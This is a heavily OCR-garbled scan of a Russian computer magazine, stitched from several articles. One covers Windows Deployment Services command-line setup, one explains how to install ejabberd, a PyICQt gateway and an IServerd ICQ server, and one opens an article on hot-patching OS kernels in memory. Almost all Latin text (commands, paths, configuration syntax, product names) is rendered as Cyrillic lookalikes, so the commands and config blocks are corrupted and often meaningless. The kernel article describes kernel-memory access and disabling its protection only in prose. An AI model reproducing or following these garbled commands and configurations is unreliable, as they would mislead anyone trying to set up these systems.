тель и загружаемся с него. 

Настройка клиента 

Все основные настройки Ѵ\Ю5 производятся 
на сервере. Чтобы установить систему на кли- 



ентском компьютере, следует выполнить всего 
несколько шагов: 

1 . В ВІ05 необходимо установить такой порядок 
загрузки, чтобы первой осуществлялась загруз- 
ка по сети. 

2. При подключении к серверу появится запрос; 
для запуска процесса РХЕ-загрузки следует 
нажать клавишу < Р 1 2 > . 

3. В появившемся меню загрузки надо выбрать 
подходящий образ; 



4. Появится знакомый мастер установки 
ѴѴіпсіоѵѵз, который запросит имя пользователя 
и пароль. Если администратор одобряет уста- 
новку системы этим пользователем, выбираем 
доступную операционную систему и следуем 
указаниям мастера. 

И через непродолжительное время на новом 
компьютере мы получаем установленную 
и готовую к использованию операционную 
систему :)..□□ 



ИСПОЛЬЗОВАНИЕ КОМАНДНОЙ СТРОКИ 

Все операции, доступные из консоли службы 
развертывания образов, можно производить 
из командной строки. Для этих целей следует 
использовать утилиту ѴѴЕ)5ЦТІЬ. Справка, 
выдаваемая при ее запуске с ключом '/?', 
занимает несколько экранов. Я расскажу 
только о некоторых ее возможностях. 

Для задания общего каталога, в котором 
будут храниться образы, достаточно ввести 
команду: 



ѴГОЗІІТІЬ /іпіьіаііге-зегѵег 
/гетіпзЬ: "БХКетоЬеІпзЬаІІ " 



Политика ответа клиентским компьютерам 
задается с помощью параметра зеі-зегѵег. 
Например, чтобы задать политику ответов 
для всех клиентов, вводим: 



ѴГОЗІІТІЬ /зеЬ-зегѵег / 
апзѵгегсііепкз : аіі 



Используя другие флаги зеі-зегѵег, можно 
настроить работу с протоколом ПНСР. Если 
служба развертывания ѴѴіпсІоѵѵз выполняет- 
ся на том же компьютере, что и служба ОНСР, 
вводим: 



ѴГОЗІІТІЬ /зе^-зегѵег / 
изесИісррогЬз :по /БНСРорЬіопбО : 
уез 



Образы установки и загрузки добавляются 
с помощью параметра асісі-іта^е. Образ 
установки задается такой командой: 



ѴГОЗІІТІЬ /асісі-ітаде / 
ітадеіііе : \\зегѵег . сот\ 
зЪаге\зоигсез\іпзЬа11 .ѵ/іт 
/ітадеЬуре : іпзЬаІІ 



А образ загрузки — такой: 



ѴГОЗІІТІЬ /асісі-ітаде / 
ітадеіііе : \\зегѵег\з!іаге\ 
зоигсез\ЪооЬ .ѵгіт /ітадеЬуре: 
ЪооЬ 



Создать образ загрузки можно, введя следую- 
щую команду: 



ѴГОЗІІТІЬ /пе>7-(іізсоѵегітаде 
/ітаде : \\зегѵег\зЬаге\зоигсез\ 
ЬооЬ.тт /агсМЬесЬиге :х86 
/ІіІераЫі: : "Ь\пете_ЪооЬ .ѵ/іпГ 



По умолчанию для 64-битной архитектуры 
отображаются как х86-, так и х64-образы. 
Если систем много, меню не сможет вывести 
большое количество образов. Чтобы сервер 
выводил для таких систем только 64-битные 
образы, вводим такую команду: 



ѴГОЗІІТІЬ /зеЬ-зегѵег / 
Беіаи11:х8бхб4ітадеТуре : х64 



Чтобы вернуться к начальному состоя- 
нию, достаточно поменять значение х64 
наЪоНі. 

И наконец, используя параметр СопѵеіТ- 
КіРгерІта§е, можно преобразовать старые 
образы в формате КІРКЕР в ѴѴІМ (требуется 
указать еще и 5ІР-файл) : 



ѴГОЗІІТІЬ /ѴегЪозе /Ргодгезз 
/СопѵегЬ-КіРгер Ітаде / 
РіІеРаЫі: "\\зегѵег.сот\ 
КетоЬеІпзЬа11\8еЬир\Ітадез\ 
КІ ЗШЫБОѴІЗ \ і 3 8 б \ Тетр 1 аЬ е з \ 
АР.зіІ" /БезЬіпаЬіопІтаде 
/ЕіІеРаЫі: " \\зегѵег . 
сот\ѴІогкіпд\Р.ІРКЕР .\л7Іт" 
/Ыате: "Му ѴІіпскжзХР ітаде" 
/БезсгірЬіоп: "СопѵегЬед КІЗ 
ітаде ѴІіпсіоѵ?зХР" /ОѵегтгіЬе: 
Аррепсі 
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Союз ТЕТИ Аси 



СЕРГЕЙ «ѲВІШЕВ» ЯРЕМЧУК 

/ СРІМОЕР ИА.РМ / 



И ДЯДИ ДЖАББЕРА 



СОЗДАЙ СВОЙ СЕРВЕР МГНОВЕННОГО ОБМЕНА СООБЩЕНИЯМИ НА БАЗЕ ЕМВВЕРО И І5ЕРѴЕР0 

Сегодня как никогда популярны различные системы мгновенного обмена сообщениями, вроде ІС(ф 
ЛаЬЪег, АОЬ, М5ІМ, УаЬоо, где общение происходит в реальном времени. Если ранее во многих организаци- 
ях администраторы просто блокировали такой трафик, чтобы перекрыть возможный канал утечки инфор 
мации, то сейчас неоспоримым является тот факт, что применение ІМ-систем часто повышает производи- 
тельность. Так давай на учебе/работе установим свой собственный ^аЪЪе^ и/или ІСО-сервер. 



ЗаЬЬегѵвІСО 

Несмотря на то что пользователи больше знают 
о ІС(^, самым популярным среди открытых 
проектов по разработке ІМ-сервера, является 
ІаЪЪег. ІаЪЪег использует открытый прото- 
кол ХМРР (еХгепзіЫе Мезза§іп§ апб Ргезепсе 
Ргоіосоі), применяющий для быстрого обмена 
сообщениями и информацией о присутствии 
между любыми двумя абонентами не ріаіп- 
текст, а ХМБ. Хотя это и несколько увеличивает 
объем сообщения и требует наличия ХМЬ-пар- 
серов, которые потребляют некоторую часть 
ресурсов, но взамен ІаЪЪег дает гибкость и 
расширяемость. Благодаря гибкости протоко- 
ла, )аЪЪег-сервер способен поддерживать ІС(^, 
ІКС, М51М, К38, УаЪоо и др. Да, если ІС(2 — это 
только обмен сообщениями между двумя поль- 
зователями, то ІаЪЪег включает и возможнос- 
ти ІКС. Поэтому вместо двух серверов (ІС(^ и 
ІКС) вполне возможно обойтись и одним. Так 
будет гораздо удобнее и администраторам, и 



пользователям. В ІаЪЪег изначально исполь- 
зуется Ііпісосіе, поэтому проблем с кодиров- 
ками не существует. Также ІаЪЪег отличает 
продуманная система защиты информации. 
Все реализации серверов поддерживают ЗЗБ, 
клиенты — шифрование с помощью РСР/СРС. 
Пароли не передаются в открытом виде, а 
используются пкІ5-хэши. Протокол ХМРР, в 
отличие от ІС(^, стандартизирован и открыт, 
поэтому список серверов, реализующих его, на 
порядок больше, чем у ІС(^. 

Серверы ІаЪЪег 

Вероятно, самый полный список серверов, 
реализующих ІаЪЪег, можно найти по адресу 
ѵѵѵѵѵѵ. і аЪЪег.огу/зоКѵѵаге /зегѵегз . зЪшіі . 

После просмотра столбцов РеаШге Зсоге и 
Ьісепзе = Спи СРБ из всех присутствующих 
можно отобрать лишь четыре: )аЪЪегс! 1.x и 
2.x, ОрепРіге и е)аЪЪегб. Список поддержива- 
емых операционных систем у всех одинаков: 



АІХ, * ВЗБ, НР-ЦХ, Ілпих, МасОЗ X, Зоіагіз, 
ѴѴіпбоѵѵз. Поэтому смотрим функциональ- 
ность и удобство. 

Первые два — очень хорошие серверы, отли- 
чаются стабильностью в работе, написаны на 
языке С. По возможностям эти серверы явля- 
ются лишь базой, поскольку большая их часть 
(вроде конференций, поиска пользователей и 
некоторых других) реализована посредством 
плагинов. Чтобы заставить работать некото- 
рые комбинации, придется изрядно попотеть. 
К тому же версия 1.x уже практически не 
развивается. 

Сервер ОрепРіге (до февраля 2007 года — 
ѴѴіЫРіге) — самый простой в установке, так как 
для его запуска требуется лишь наличие іаѵа 
Кипгіте Епѵігоптепі:. Да, он написан на іаѵа, но 
сегодня это никого уже пугать не должно. Для 
тех, кто не хочет использовать внешнюю базу 
данных (МуЗОЬ, РозГ^гез, МісгозоЛ ЗОБ Зегѵег, 
ОВ2), в наличии есть встроенная НЗ<2ІЛЖ 
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Все настройки осуществляются через удобный 
веб-интерфейс. В установке по умолчанию 
ОрепРіге имеет большое количество возмож- 
ностей, остальное (Азіегізк, широковещатель- 
ные сообщения, ІМ-шлюз, контент-фильтр и 
прочее) реализуется посредством плагинов. 
Последний названный нами сервер — е)аЬЬегб 
Г\ѵ\ѵ\ѵ.ргосе55-опе.пеС/еп/еіаЬЬег(і) . Практичес- 
ки все его возможности, заложенные в прото- 
коле, реализованы из коробки. Написан он на 
языке Егіапд Гегіап^.ог^) . в качестве базы данных 
используется Мпезіа (поддерживаются и другие: 
МуЗ(^Ь, РозИ^геЗрЬ) . Язык Ег1ап§ предназначен 
для создания отказоустойчивых распределен- 
ных приложений. Результат — е]аЬЬегсі может 
работать в кластере, когда один домен физи- 
чески могут обслуживать несколько серверов, 
синхронизируя информацию через единую 
базу данных. Откомпилированные приложения 
выполняются в Егіапд (ЛАМ) ешиіаюг, этим он 
несколько похож на Лаѵа. Этот сервер и выбираем 
для установки. 

Установка еіаЬЬегс! 

На странице закачки проекта е)аЬЬегб можно 
найти ссылки на установочные файлы для 
ѴѴіпсІоѵѵз, Мае 05 X (РоѵѵегРС и ІШеІ) , Ілпих и 
исходные тексты. В репозитариях дистрибу- 
тивов ПеЬіап, ЦЬипШ, Мапбгіѵа, ОрепЗИЗЕ, 
Ребога, РгееВЗБ имеются пакеты для установки 
еіаЪЪегсІ. Для компиляции, помимо таке и 
§сс, понадобятся библиотеки ОрепЗЗЬ и 2НЬ, 
а также Ег1ап§/0ТР. Установка последнего 
несколько необычна, но проста. 

Скачиваем дистрибутив : 

$ ѵ/деб — с Ьббр: / /егіапд . огд/ 
<іоѵпі1оасі/оЬр_згс_К11В-4 . баг . дт. 

Создаем каталог для установки : 

$ зисіо тксііг /изг/іосаі /егіапд 
$ сб. /изг/іосаі/егіапд 
$ зибо ткбіг обр_г11Ъ 
$ с б. обр_г11Ъ 

Распаковываем дистрибутив: 

$ зибо дипгір -с /Ьоте/дгіпбег/ 
обр_згс_К11В-4 . Саг . дт, | баг хір - 

Запускаем установочный скрипт: 

$ зибо . /Іпзбаіі /изг/іосаі/ 
егіапд/ обр_г11Ъ 

Скрипт начнет задавать вопросы, в большинс- 



тве случаев достаточно оставлять значение 
по умолчанию, просто нажимая «ЕпИег». По 
окончании установки для удобства создаем 
символическую ссылку на исполняемый файл: 

$ зисіо 1п -з /изг/іосаі/егіапд/ 

обр_г11Ъ/Ъіп/ег1 /изг/Ьіп/егІ 

Установка е]аЬЬегб из исходных текстов 
стандартна: 

. /сопбідиге; таке; зисіо таке 

ІпзЬаІІ 

В ЦЬипШ и других дистрибутивах, имеющихся 
в репозитарии е)аЪЪегб, процесс установки 
выглядит на порядок проще : 

$ зисіо арб-деб ирбабе 

$ зисіо арб-деб іпзбаіі е^аЪЪегб 

В результате будет установлен не только сервер 
фабЪегс!, но и все зависимости, включая ег1ап§. 
Пакет с расширением Ьіп для Ілпих и ехе для 
ѴѴіпбоѵѵз предлагают графический инсталля- 
тор, позволяющий по ходу установки произвес- 
ти основные настройки. 

Конфигурационный файл еіаЬЬегс! 

Все настройки находятся в конфигурационном 
файле /еІс/е)аЬЬегб/е)аЬЬегб.сІ§. При загрузке 
демон считывает этот файл, анализирует и 
сохраняет в базу данных. Конфигурационный 
файл содержит последовательность условий 
Ег1ап§. Все строки, начинающиеся со знака «%», 
считаются комментариями и игнорируются. 
Любое условие состоит из названия параметра, 
которое находится на первом месте, а далее 
идет одно или несколько его возможных значе- 
ний. В конце условия обязательно ставится точ- 
ка. Также следует помнить, что в условиях не 
должно быть разрывов, то есть лишних строк; 
для правки желательно использовать редактор, 
умеющий ставить Цпіх'овый одиночный сим- 
вол окончания строки. 

Если какое-либо из условий не будет опреде- 
лено в конфигурационном файле, использу- 
ются значения, сохраненные в базе данных. 
Чтобы их аннулировать, применяются 
конструкции оѵеггібе_§1оЬа1, оѵеггібе_1оса1, 
оѵеггібе_ас1з. Обычно условия сразу встав- 
ляют в конфигурационный файл, чтобы не 
путаться в том, какие настройки сервер знает, 
а какие нет. При установке, как с использо- 
ванием исходных текстов, так и с помощью 
пакетов, создается шаблон, остается его лишь 
немного подправить: 



#ѴІ ЕМВВЕКО.СРО 

оѵеггісіе_ас1з . 

% Список домена ( ов ) , который об- 
служивает сервер 
{Іюзбз, [ " дгіпбег . сот» , 

" Іосаіііозб " ] } . 

% Язык сообщений сервера 
{Іапдиаде, "ги"}. 

% Пользователи с привилегиями 
администратора 

{асі, абтіп, (изег, "дгіпбег"}}. 
{асі, абтіп, (изег, "зегдез"}}. 

% Список заблокированных 
пользователей 

{асі, Ыоскеб, {изег, "безб"}}. 

% Разрешаем локальных 

пользователей 

{асі, Іосаі , {изег_гедехр, 

% Разрешаем использовать кон- 
фигурационный интерфейс только 
администраторам 
{ассезз, сопбідиге, [{аііоѵ?, 
абтіп} ] } 

% Разрешаем регистрацию 
пользователей 
{ассезз, гедізбег, [{а11оѵ7, 
аіі} ] } . 

% Так можно запретить самостоя- 
тельную регистрацию пользовате- 
лей, сделав сервер закрытым 
% {ассезз, гедізбег, [{бепу, 
аіі} ] } . 

% Сообщение при регистрации , 
можно использовать буквы русского 
алфавита 

{ѵ?е1соте_теззаде , 

{ "Меісоте! " , "Меісоте Сгіпсіег 
баЪЪег Зегѵісе . " } } . 

% Кому отсылать сообщения о ре- 
гистрации новых пользователей 
{гедізбгабіоп_ѵ?абсІіегз , 

[ "дгіпбег@дгіпбег . сот" ] } . 

% Разрешаем только админам отсы- 
лать многоадресные объявления 
{ассезз, аппоипсе, [{аііоѵ?, 
абтіп} ] } . 
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% Только незаблокированные поль- 
зователи могут соединяться с 
севером 

{ассезз, с2з, [{бепу, Ыоскеб} , 
{аііоѵ?, аіі} ] } . 

% Администраторы сервера являют- 
ся и администраторами МТІС (Миібі 
бзег Скаб) 

{ассезз, тис_абтіп, [{аііом, 
абтіп} ] } . 

% Разрешаем всем пользователям 

подключаться к МІІС 

{ассезз, тис, [{аііом, аіі}]}. 

% Используем встроенную базу 
данных 

{аибЬ._теб1юб, іпбегпаі}. 

% Порты, на которых будут рабо- 
тать сервисы е^аЬЪегб 
{ Іізбеп, 

% Обычный сервис с1іепб-2-зегѵег 
[{5222, е^аЪЪе^б_с2з , [{ассезз, 
с2з} , 

збагббіз, {сегббііе, "/ебс/ 
ззІ/сегбз/езаЪЪегб.рет" } , 
{зЬарег, с2з_зЬарег } ] } , 

% Сервис с1іепб-2-зегѵег с ис- 
пользованием ЗЗЬ 
{5223, езаЪЪегб_с2з , [{ассезз, 
с2з } , 

біз, {сегббііе, "/ебс/ззі/ 
сегбз/езаЪЪегб.рет" } , 

{зкарег, с2з_зЬарег} ] } , 

% Порт для работы зегѵег-2-зегѵег 
{52 69, е^аЪЪе^б_з2з_іп, 

[{зЬарег, з2з_з!іарег } ] } , 
{оибдоіпд_з2з_рогб , 5269}. 

% Транспорт баЪЪег <-> ІС<2 
{5347, езаЬЬегб_зегѵісе, [ { ір , 
{127, 0, 0, 1}}, {ассезз, Іосаі}, 
{козб, [ "ісд.дгіпбег .сот», 
"зтз . Іосаікозб" ] , [{раззѵ/огб, 

" зесгеб "}]}]}, 

% Веб-интерфейс 

{5280, езаЪЪегб_кббр, [кббр_ 

роіі , ѵ7еЬ_абтіп] } ] } . 

% Используемые модули и параметры 
{тобиіез , 

[ 



{тоб_аппоипсе, [{ассезз, 
аппоипсе} ] } , 

]}. 

В принципе, конфигурационный файл 
понятен, но при его заполнении следует быть 
внимательным . 

Настраиваем БЫВ, заводим 
администраторов 

В этом же каталоге находится еще один важный 
файл — іпеігс, отвечающий за работу со служ- 
бой БИ5. Если сервер е)аЪЪегб применяется в 
локальной сети, где нет смысла настраивать 
БИЗ-сервер, необходимо указать на использо- 
вание /еПс/Тюйз: 

{бііе, Ьозбз, " /ебс/Ьозбз" } . 

{бііе, гезоіѵ, " /ебс/гезоіѵ. 
сопб " } . 

% сначала ищем записи в бюзбз, а 
затем обращаемся к РЫ5 
{Іоокир, [бііе, бпз] } . 

В файле /еЩ/ЬозЩ должна быть запись, ука- 
зывающая на соответствие ІР-адреса и имени 
компьютера: 

127 .0.0.1 Іосаібюзб 
192.168.1.158 дгіпбег.сот 

Теперь запускаем/перезапускаем сервер. Это 
можно сделать двумя способами. 

Стандартным: 

$ зибо /ебс/іпіб . б/е^аЬЪегб 
гезбагб 

Или с использованием утилиты даЪЪегсІсіІ: 

$ зибо езаЬЬегбсбІ гезбагб 

Проверяем статус работы сервера: 

$ зибо езаЬЬегбсбІ збабиз 

Ыобе езаЬЬегб@дгіпбег із збагбеб. 

Збабиз: збагбеб 

Если в ответ мы получаем другое сообщение, то 
просматриваем вывод пебзбаб -па. Если в вьшоде 
нет открытых портов, указанных в конфигураци- 
онном файле, значит, сервис не запустился (или 
запустился частично) . Останавливаем его работу 
и проверяем е]аЬЬегб.с%. Еслиже порты в списке 
есть, то начинать следует с разрешения имен. 
Теперь необходимо завести пользователей. 



имеющих права администратора. В нашем 
случае это §гіпбег и зег§е] : 

$ зибо езаЪЬегбсбІ гедізбег 
зе^де^ дгіпбег.сот зирег_ 
раззѵюгб 

Проверяем, что пользователь успешно создан: 

$ зибо езаЬЬегбсбІ гедізбегеб- 
изегз 

зегдез @дгіпбег . сот 

Все нормально, аналогично заводим и второго 
админа. Теперь, если был разрешен веб-ин- 
терфейс, вызываем веб-браузер и заходим на 
страницу Ьир://^гіпбег.сот:5280/абтіп . На 
запрос имени пользователя и пароля вводим 
параметры учетной записи администратора. 
Только к имени добавляем и домен, то есть 
вместо «зег§ер> вводим «зег§е)@ дгіпбег.сот». 
Веб-интерфейс позволяет в удобной форме 
настраивать списки управления доступом, 
заводить и удалять пользователей, просматри- 
вать статистику. Следует помнить, что все на- 
стройки, произведенные через веб-интерфейс, 
в конфигурационном файле не сохраняются. 
При наличии записей оѵеггібе_* они будут дейс- 
твительны до первой перезагрузки. Все, сервер 
к работе готов, можно зазывать пользователей. 

ТранспортІСО <-> ЛаЬЬег 

Некоторые пользователи, вероятно, не захотят 
отказываться от ІС([). Для них можно настроить 
транспорт ІС([) < - > ЛаЪЪег. Организуется он с 
помощью РуІСС^і ( рѵісд-бЫаЕЬегзоигсе . огу) . для 
работы которого дополнительно потребуются 
библиотеки ТѵѵізНеб, РуСгурЮ и РуОрепЗЗЬ 
(ѵѵѵѵѵѵ.иѵізщбтаЕгіх.сот) . В ЦЪипт/БеЪіап их 
очень просто установить одной командой: 

$ зибо арб-деб іпзбаіі рубЬоп- 
бмізбеб рубкоп-сгурбо рубкоп- 
руорепззі 

Так мы установим РунЬоп и прочие недо- 
стающие программы и библиотеки. Теперь 
скачиваем и распаковываем РуКфб Переиме- 
новываем шаблон конфигурационного файла 
соп1і§_ехатр1е.хт1 в сопй§.хш1 и редактируем: 

#ѴІ С0ЫРІ6.ХМІ_ 

<руісдб> 

< 3 іб>ісд. дгіпбег . сот</;і іб> 

< ! — здесь указан текущий 
каталог, езаЬЬегб должен иметь 
право на запись в него --> 
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<зроо1біг>. </зроо1біг> 
<ріб>РуІС()Д .ріб</ріб> 
<таіп5егѵег>127 .0.0. 1</ 
таіпЗегѵег> 

стаіпЗегѵег Л Б>е ^ аЪЪегб . 
1оса1Ъ.озД</таіп5егѵегЛБ> 

< ! — веб-интерфейс нужен 
пеѵсж {шт .пеѵоѵг .огд) --> 

<Ѵ7еЪзіДе>ІіДДр : // заЪЪег . 
1оса11іозД/</™еЪзіДе> 

<ѵ7еЬрог Д > 1 2 3 4 5 < / ѵ/еЪрог Д > 
<рогД>5347</рогД> 

< ! — пароль для доступа к 
е^ аЪЪегб; 

должен совпадать с е ^ аЪЪегб. с Дд 
— > 

<зесгеД>зесгеД</зесгеД> 

< 1 — язык для сообщений об 
ошибках --> 

<1апд>еп</1апд> 
<епсобіпд>ср12 5 1< / 
епсобіпд> 

<ісдЗегѵег>1одіп. ісд. сош</ 
ісдЗегѵег> 

<ісдРогД>5190</ісдРогД> 

< ! — блокируем регистрацию 
(по желанию) --> 

<бізаЫеКедізДег/> 

< епаЬ 1 е Аир о Іп ѵі Д е / > 

< ! — <бізаЪ1еХНТМЬ/> — > 

<!-- <бізаЪ1еМаіІЫоДі:і:ісаД 
іопз/> --> 

<бізаЫеБе:ЕаиІДАѵаДаг/> 

<абтіпз> 

< ^ іб>дгіпбег@ 
ІосаПіозДс/;] іб> 

</абтіпз> 

</руісдЪ> 

Теперь запускаем шлюз командой ругіюп 
РуКХЭъру. Открываем баЪЪег-клиент, в 
браузере ресурсов находим ісд.угіпбег.сот и 
вводим свой ТЛИ и пароль. Если все настроено 
правильно, то в списке должен появиться агент 
с именем ІСО Тгапзрогі: или подобный. После 
этого можно добавлять контакты ІСО в форме 
ІЛ N @ §гіпбег. сот . 

Настройка ІБегѵегб 

Эту часть статьи посвятим приверженцам 
протокола ІС(^. Выбор ІС(^-сервера упрощает- 
ся практическим отсутствием альтернатив. 
Единогласно на всех ресурсах рекомендуется 
один сервер — ІЗегѵегсі (ІС<2 зегѵег баетоп, 
ізегѵегб.кЬзЩ.ги) . Он исходно работает только 
под Шіх-совместимыми системами, но автор 
говорит, что, возможно, он скомпилируется 



при помощи су^ѵѵіп под ѴѴіпбоѵѵз. На настоя- 
щий момент существует две ветви проекта: 
стабильная (2.х.хили зІаЫе) и версия для 
разработчиков (З.х.х) . Для установки будем 
использовать последний на момент написания 
статьи ІЗегѵегб-зНаЫе (2.5.5). Также для хране- 
ния информации обо всех зарегистрированных 
пользователях, включая пароли, записей о 
подключенных пользователях, отложенных 
сообщениях и т.д. потребуется РозИ^геЗОЬ. 
Установка ІЗегѵегсі стандартна: 

. /сопіідиге --ргеііх=/изг -- 
тДЪ.-гиззіап; таке; таке іпзДаІІ 

Запускаем РозІ^геЗС^Ь. 

$ зибо /еДс/іпіД . 6/розДдгездІ 
зДагД 

В подкаталоге зсгірС архива с исходными текста- 
ми находим файл бЪ_тапа§е, который поможет 
создать все необходимые базы: 

$ зибо сЬтоб +х . /бЬ_тападе 
$ зи розДдгез 
$ . /бЪ_тападе . зЬ. сгеаДе 

Скрипт спросит имя новой базы (изегз_бЪ), 
пользователя для доступа (ізегѵегб) и пароль. 
Переходим в каталог /еСс/ізегѵегб и копируем: 

$ зибо ср ізегѵ. сопі . беіаиІД 
ізегѵ. сопі 

С остальными файлами, имеющими префикс 
«беіаик», поступаем аналогично. Основной 
конфигурационный файл называется ізегѵ. 
сопД. Необходимо подправить в нем ряд пара- 
метров: 

# VI І5ЕРѴ.С0МР 

# по умолчанию ІЗегѵегб будет 
ожидать соединения на всех 
интерфейсах 

Віпб іпДегіасе = 0.0.0.0/32 

# файл трансляции из каталога 
ДгапзІаДе, чтобы все данные в БД 
были в общепринятой для указанно- 
го языка кодировке 

ТгапзІаДе ДаЫе = Ш35ІАЫ_ 

иш 

# кому отправлять сообщения 

Абтіп етаіі = дгіпбег@1оса11юзД 
ІпДо Раззѵгогб = зирег_ 

раззмогб 

# параметры подключения к БД 



баДаЪазе изег = ізегѵег 
баДаЪазе раззѵ^огб = раззѵгогб 
баДаЬазе аббг = 127.0.0.1 

баДаЪазе рогД = 5432 

изегз 6Ь пате = изегз_бЪ 
# подключаем файлы с описанием 
протоколов 

Іпсіибе = еДс/ѵЗ_ргоДо . 

сопД 

Іпсіибе = еДс/ѵ5_ргоДо. сопД 
Іпсіибе = еДс/ѵ7_ргоДо. сопі 

Чтобы клиенты могли регистрироваться 
самостоятельно, в файле ѵЗ_ргот.сопГ уста- 
навливаем следующие параметры (в файлах 
ѵ5_рго1:о.сопД и ѵ7_ргот.сопГ есть аналогичный 
параметр) : 

ѴЗ аиДо гедізДгаДіоп = Уез 
ѴЗ розД-гедізДег іпДо = еДс/ 
ДехДз/розД_гед_аиДо . ДхД 

Пользователей можно заводить и вручную. Для 
этой цели в комплекте имеется утилита ісдизег: 

$ зи рдзді 

$ сб /еДс/ізегѵегб/бЪ 
$ . /ісдизег абб ІІШ 

Для автоматического запуска сервера в 
каталоге зсгірі подготовлены два скрипта: 
ізегѵегб. зіі и ізегѵегб. зЪ.азр. Второй ориенти- 
рован на КебНа* и производные от него дист- 
рибутивы. В общем случае копируем ізегѵегб. 
5І1 в /еСс/іпідб и создаем символическую 
ссылку на нужный уровень запуска: 

$ зибо зсгірД/ізегѵегб. зЪ. /еДс/ 
іпід . б/ізегѵегб 

$ зибо 1п — з /еДс/іпіД .б/ізегѵегб 
/еДс/гсЗ . б/898ізегѵегб 

Стартуем: 

$ зибо /еДс/іпіД . б/ізегѵегб зДагД 

Также стоит обратить внимание на наличие веб- 
интерфейса для ІЗегѵегб — ізб\ѵт (ізегѵегб.кіізш. 
ги/ізбѵѵт/іпбех гбщпі) . С его помощью можно 
легко найти и просмотреть параметры, добавить, 
блокировать и удалить учетную запись, очистить 
список отложенных сообщений и т.д. Будет 
полезен и набор скриптов для сбора статистики 
ізегѵегб. к!і5т.ги/бо\ѵп1оаб/І8егѵегб-5і:аи:аг.§2. 
Надеюсь, теперь установка своего ІС(^ или 
баЬЬег-сервера не должна вызвать проблем. 
Успехов, ц-ц 
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Хакерские 

ПРИЕМЫ НА СЛУЖБЕ 
У АДМИНА 

НАКЛАДЫВАНИЕ ОБНОВЛЕНИЙ НА СЕРВЕРЫ ѴѴШйОѴѴБ И *ШХ БЕЗ ПЕРЕЗАГРУЗКИ 



Наложение заплаток на ядро обычно требует перезагрузки системы, что не всегда приемлемо (особенно в 
отношении серверов), однако ядро можно залатать и вживую. Аналогичным образом поступают и защит- 
ные системы, руткиты и прочие программы, модифицирующие ядро налету, но! Практически все они 
делают это неправильно! Ядро нужно хачить совсем не так! Мыщъх укажет верный путь, пролегающий 
сквозь дебри технических проблем, особенно характерных для многопроцессорных систем. 



амомодифицирующийся код дол- 
гое время считался дурным тоном 
программирования и уделом 
хакеров-извращенцев. Теоретики 
программирования уходили от практических 
потребностей, порождая сферических коней в 
вакууме, совершенно не заботясь о проблемах 
тех, кому на них приходится ездить. 
Аналогичным образом обстоят дела и с 
модификацией ядер операционных систем, 



разработчики которых предоставляют про- 
граммисту набор АРІ-функций для управления 
памятью, процессами и прочими системными 
ресурсами, но только не самим ядром! 
Вмешательство во внутреннюю жизнь ядра 
— это грязный хак, всегда таящий в себе 
потенциальную опасность развалить все и вся. 
Большинство программ, модифицирующих 
ядро, делают это настолько небрежно, что при 
знакомстве с ними остается только удивляться, 



как же они ухитряются работать и не падать? 

В действительности они падают, причем на 
многопроцессорных машинах частота падений 
существенно увеличивается. Корректная моди- 
фикация отличается от некорректной тем, что 
гарантирует сохранение работоспособности и 
потому практически безопасна. Она может при- 
меняться не только в хакерских программах, не 
обращающих никакого внимания на стабиль- 
ность, но и в промышленных установках. 
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> Пример кумулятивной заплатки для Реб Наі, исправляющей 
ошибку в подсистеме 5СТР 



> Проникновение вядро 



Расплатой за корректность становится резко 
возросшая сложность техники модификации, а 
также некоторое замедление работы системы, 
поэтому к Ьоі-раісЬ'у на серверах следует при- 
бегать лишь в тех случаях, когда перезагрузка 
невозможна или крайне нежелательна. 

Техника поиска различий 

Для создания «горячей» заплатки необходи- 
мо иметь сШГ-файл, показывающий, каким 
образом была заткнута дыра, после чего нам 
остается только перевести исправления на 
язык ассемблера, модифицируя ядро непос- 
редственно в оперативной памяти. 

К сожалению, раздобыть сШГ-файл удается 
далеко не всегда. Зачастую разработчики 
распространяют кумулятивные обновления, 
включающие в себя множество исправлений, 
не имеющих к дыре никакого отношения и 
модифицирующих внутренние структуры 
ядра, в результате чего «горячая» модификация 
кода влечет за собой необходимость пере- 
стройки данных, с которыми работает ядро. 

А это уже нереально, особенно с учетом того, 
что обработка данных не атомарна и в момент 
наложения заплатки старые данные могут 
находиться на различных стадиях обработки, 
будучи загруженными в локальные перемен- 
ные и регистры. 

А что делать, если исходные тексты недоступны 
(как, например, в случае ѴѴіпсІо\ѵ5) или в них 
не удается разобраться? ! Тогда необходимо 
прошвырнуться по зесигііу-сайтам, раскурить 
имеющиеся эксплойты, в общем, разобраться, 
где прячется уязвимость и как ее устранить. 
Достаточно часто первооткрыватели дыры не 
только сообщают параметры вектора атаки, 
но и приводят дизассемблерные листинги 
двоичных модулей (или реконструированный 
псевдокод) с указанием ошибок, либо описыва- 



ют обстоятельства атаки, позволяющие найти 
дыру самостоятельно. 

Техника горячей модификации ядра 

В операционных системах семейства Ьіпих 
и ОТ ядро проецируется на единое 4-гига- 
байтное адресное пространство. В Ілпих 
ядро занимает 1 Гб, располагаясь по адресам 
СООООООЬ— РРЕРРРРРЬ. В ОТ/ѴѴ2К/ХРядро по 
умолчанию отъедает 2 Гб, занимая старшую 
половину адресного пространства (8000000І1 
— РРРРРРРРЬ), но если указать ключ /ЗОВ в 
файле ЬооГ.іпі (поддерживаемый, начиная 
с ѴѴіпсІоѵѵз 2000 Абѵапсеб Зегуег/ВаГасеШег 
8егѵег), то ядро ужмется до 1 Гб. Ядро РгееВЗЭ, 
вплоть до версии 3.x, занимало всего 256 Мб, 
но, начиная с версии 4.x, разрослось до 1 Гб, 
оккупируя регион СООООООЬ — РРРРРРРРЬ. 
Память ядра доступна с прикладного уровня че- 
рез псевдоустройство \Веѵісе\РІіу5ІсаІМетогу 
(ОТ/ѴѴ2К/ХР) и /беѵ/ктет Олпих/ВЗБ) . 

В ранних версиях ОТ псевдоустройство 
РйузісаІМетогу было открыто для чтения/ 
записи любому пользователю из группы «Адми- 
нистраторы», однако, начиная с ѴѴіпсІот 2003 
Зегѵег 8Р1, к нему не может получить доступ 
даже ЗузГет. 

ІЖІХ-подобные системы тоже закрывают 
доступ к ктет, и недалек тот день, когда 
из большинства дистрибутивов оно будет 
полностью изъято. И хотя псевдоустройс- 
тво /сіеѵ/тет (физическая память до 
линейной трансляции) по-прежнему в 
строю и отказаться от него никак не полу- 
чается (поскольку его используют многие 
приложения, те же Х'ы, например), для 
модификации ядра оно не годится, посколь- 
ку не обеспечивает атомарности, а значит, 
наложение заплатки может привести к 
краху системы. 



Из драйвера (или, используя терминологию 
ІЖІХ-подобных систем, «загружаемого моду- 
ля») , работающего на нулевом кольце, память 
ядра защищена от непреднамеренной моди- 
фикации, однако эту защиту легко отключить. 
Исключение составляют 64-разрядные версии 
